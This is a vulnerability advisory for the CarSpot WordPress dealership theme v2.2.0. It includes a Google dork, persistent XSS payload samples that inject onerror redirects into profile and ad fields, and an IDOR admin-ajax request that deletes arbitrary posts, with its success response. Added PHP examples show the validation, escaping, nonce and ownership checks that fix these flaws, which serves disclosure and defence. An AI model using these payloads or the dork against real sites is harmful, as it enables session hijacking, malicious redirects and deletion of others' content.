# Exploit Title: CarSpot – Dealership Wordpress Classified Theme v2.2.0 Multiple Vulnerabilities
# Google Dork: /wp-content/themes/carspot/
# Date: 14/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://scriptsbundle.com/
# Software Link: https://themeforest.net/item/carspot-automotive-car-dealer-wordpress-classified-theme/20195539
# Version: 2.2.0
# Tested on: Kali Linux
# CVE: -
# CWE: 79, 639

----[]- Info: -[]----
Demo website: https://carspot.scriptsbundle.com/
Demo Profile #0: https://carspot.scriptsbundle.com/dealer/m0ze-1054757240/
Demo Profile #1: https://carspot.scriptsbundle.com/dealer/greetzfromm0ze/
Demo Profile #2: https://carspot.scriptsbundle.com/dealer/jibom21023/

----[]- Persistent XSS -> Registration Form/User Profile: -[]----
Any cookie-stealing payload can be used to hijack a user or administrator session, or to force a redirect to a malicious website. Vulnerable input field: «Mobile Number».

Payload Sample: "><!--<img src="--><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//">


POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
Referer: https://carspot.scriptsbundle.com/register/
Cookie: _your_cookies_here_


----[]- Persistent XSS -> Ad Post -[]----
Any cookie-stealing payload can be used to hijack a user or administrator session, or to force a redirect to a malicious website. Vulnerable input fields: «Mobile Number», «Address», «Latitude» and «Longitude».

Payload Sample #0: "><!--<img src="--><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//">
Payload Sample #1: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">


POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
Referer: https://carspot.scriptsbundle.com/sell-your-car/
Cookie: _your_cookies_here_
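As an added defensive example (not code from this advisory or from the CarSpot theme), the following shows how the fields named in both persistent XSS sections above can be handled safely: strict validation on input, and context-specific escaping on output. The hook name `example_save_profile`, the form field names, the meta keys and the rendering markup are all assumptions made for the example.

```php
<?php
// Added example, not CarSpot's code. Hook names, meta keys and form field
// names are assumptions.

/**
 * Validate a mobile number on input: allow only digits, spaces, +, -, ( ).
 * A payload such as "><img src=x onerror=...> fails this check and is
 * never stored.
 */
function example_validate_mobile( $raw ) {
    $mobile = sanitize_text_field( wp_unslash( $raw ) );
    if ( ! preg_match( '/^\+?[0-9][0-9 ().-]{5,19}$/', $mobile ) ) {
        return new WP_Error( 'invalid_mobile', 'Mobile number contains invalid characters.' );
    }
    return $mobile;
}

/**
 * Latitude/longitude are numbers: require a numeric value and range-check
 * it, so only a float is ever stored for these fields.
 */
function example_validate_coordinate( $raw, $limit ) {
    if ( ! is_numeric( $raw ) ) {
        return new WP_Error( 'invalid_coordinate', 'Coordinate must be numeric.' );
    }
    $value = (float) $raw;
    if ( $value < -$limit || $value > $limit ) {
        return new WP_Error( 'invalid_coordinate', 'Coordinate out of range.' );
    }
    return $value;
}

add_action( 'wp_ajax_example_save_profile', 'example_save_profile' );
function example_save_profile() {
    // Nonce ties the request to a form served to this logged-in user.
    check_ajax_referer( 'example_save_profile', 'nonce' );

    $mobile = example_validate_mobile( $_POST['mobile'] ?? '' );
    if ( is_wp_error( $mobile ) ) {
        wp_send_json_error( array( 'message' => $mobile->get_error_message() ), 400 );
    }
    // Free-text address: strip tags and control characters on the way in.
    $address = sanitize_text_field( wp_unslash( $_POST['address'] ?? '' ) );

    $lat = example_validate_coordinate( $_POST['latitude'] ?? '', 90 );
    $lng = example_validate_coordinate( $_POST['longitude'] ?? '', 180 );
    if ( is_wp_error( $lat ) || is_wp_error( $lng ) ) {
        wp_send_json_error( array( 'message' => 'Invalid coordinates.' ), 400 );
    }

    $user_id = get_current_user_id();
    update_user_meta( $user_id, 'example_mobile', $mobile );
    update_user_meta( $user_id, 'example_address', $address );
    update_user_meta( $user_id, 'example_lat', $lat );
    update_user_meta( $user_id, 'example_lng', $lng );
    wp_send_json_success();
}

/**
 * Output side: escape for the exact HTML context. Even if a bad value had
 * reached the database, esc_attr() turns the quote and angle brackets of the
 * advisory's payload into entities, so the attribute cannot be broken out of,
 * and esc_html() does the same for text content.
 */
function example_render_contact( $user_id ) {
    $mobile  = get_user_meta( $user_id, 'example_mobile', true );
    $address = get_user_meta( $user_id, 'example_address', true );
    $lat     = (float) get_user_meta( $user_id, 'example_lat', true );
    $lng     = (float) get_user_meta( $user_id, 'example_lng', true );

    printf(
        '<a href="tel:%1$s" data-lat="%3$F" data-lng="%4$F">%2$s</a><p>%5$s</p>',
        esc_attr( $mobile ),
        esc_html( $mobile ),
        $lat,
        $lng,
        esc_html( $address )
    );
}
```

The two halves are independent defences: the input validation stops the advisory's payloads from being stored at all, while the output escaping means a stored value can still not execute. Both are needed, because the same meta value is typically printed in several templates, and any one of them that echoes it raw reintroduces the stored XSS.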


----[]- IDOR: -[]----
Delete any post/page/ad:


POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
Referer: https://carspot.scriptsbundle.com/search-cars/?carspot_layout_type=4
Cookie: _your_cookies_here_


ad_id=XXXX - the unique WordPress ID of the page/post/ad; it can be discovered from the class attribute of the page's <body> tag.


HTTP/1.1 200 OK

1|Ad removed successfully.
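As an added defensive example (not code from this advisory, which does not show the theme's handler, nor from the CarSpot theme), this is an admin-ajax deletion handler with the checks whose absence the IDOR above demonstrates: a nonce, a post-type restriction, and an ownership/capability check on the requested ID. The action name `example_delete_ad`, the nonce action, the `example_ad` post type and the log line are assumptions.

```php
<?php
// Added example, not CarSpot's code. Action name, nonce action and the
// 'example_ad' post type are assumptions.

add_action( 'wp_ajax_example_delete_ad', 'example_delete_ad' );

function example_delete_ad() {
    // 1. CSRF: the request must carry a nonce issued for this action to the
    //    current user; a third-party page cannot obtain one.
    check_ajax_referer( 'example_delete_ad', 'nonce' );

    // 2. Input: ad_id must be a positive integer.
    $ad_id = isset( $_POST['ad_id'] ) ? absint( $_POST['ad_id'] ) : 0;
    if ( ! $ad_id ) {
        wp_send_json_error( array( 'message' => 'Missing ad_id.' ), 400 );
    }

    // 3. Object type: only ads may be removed through this endpoint, never an
    //    arbitrary page or post (the advisory shows any post type being removed).
    $post = get_post( $ad_id );
    if ( ! $post || 'example_ad' !== $post->post_type ) {
        wp_send_json_error( array( 'message' => 'No such ad.' ), 404 );
    }

    // 4. Authorization (the IDOR fix): the caller must own this ad or hold a
    //    capability that maps to deleting others' posts. Being logged in and
    //    knowing the ID is not enough.
    if ( ! current_user_can( 'delete_post', $ad_id ) ) {
        wp_send_json_error( array( 'message' => 'You may not delete this ad.' ), 403 );
    }

    // Soft-delete so an unwanted removal can be reverted from the trash.
    if ( ! wp_trash_post( $ad_id ) ) {
        wp_send_json_error( array( 'message' => 'Could not remove ad.' ), 500 );
    }

    // Audit trail: who removed what, for later investigation of abuse.
    error_log( sprintf( 'ad %d trashed by user %d', $ad_id, get_current_user_id() ) );

    wp_send_json_success( array( 'message' => 'Ad removed successfully.' ) );
}

// Nonce the front-end must send in the 'nonce' field; printed into the
// template next to the delete button.
function example_delete_nonce() {
    return wp_create_nonce( 'example_delete_ad' );
}
```

For `current_user_can( 'delete_post', $ad_id )` to resolve to the owner check, the ad post type has to be registered with `'map_meta_cap' => true` and an explicit `capability_type`; with that in place WordPress grants `delete_post` to the author and to roles holding `delete_others_posts` for that type, which is exactly the ownership rule the advisory's endpoint is missing. The nonce alone would not have prevented this bug: it stops cross-site requests, not a logged-in user supplying someone else's `ad_id`.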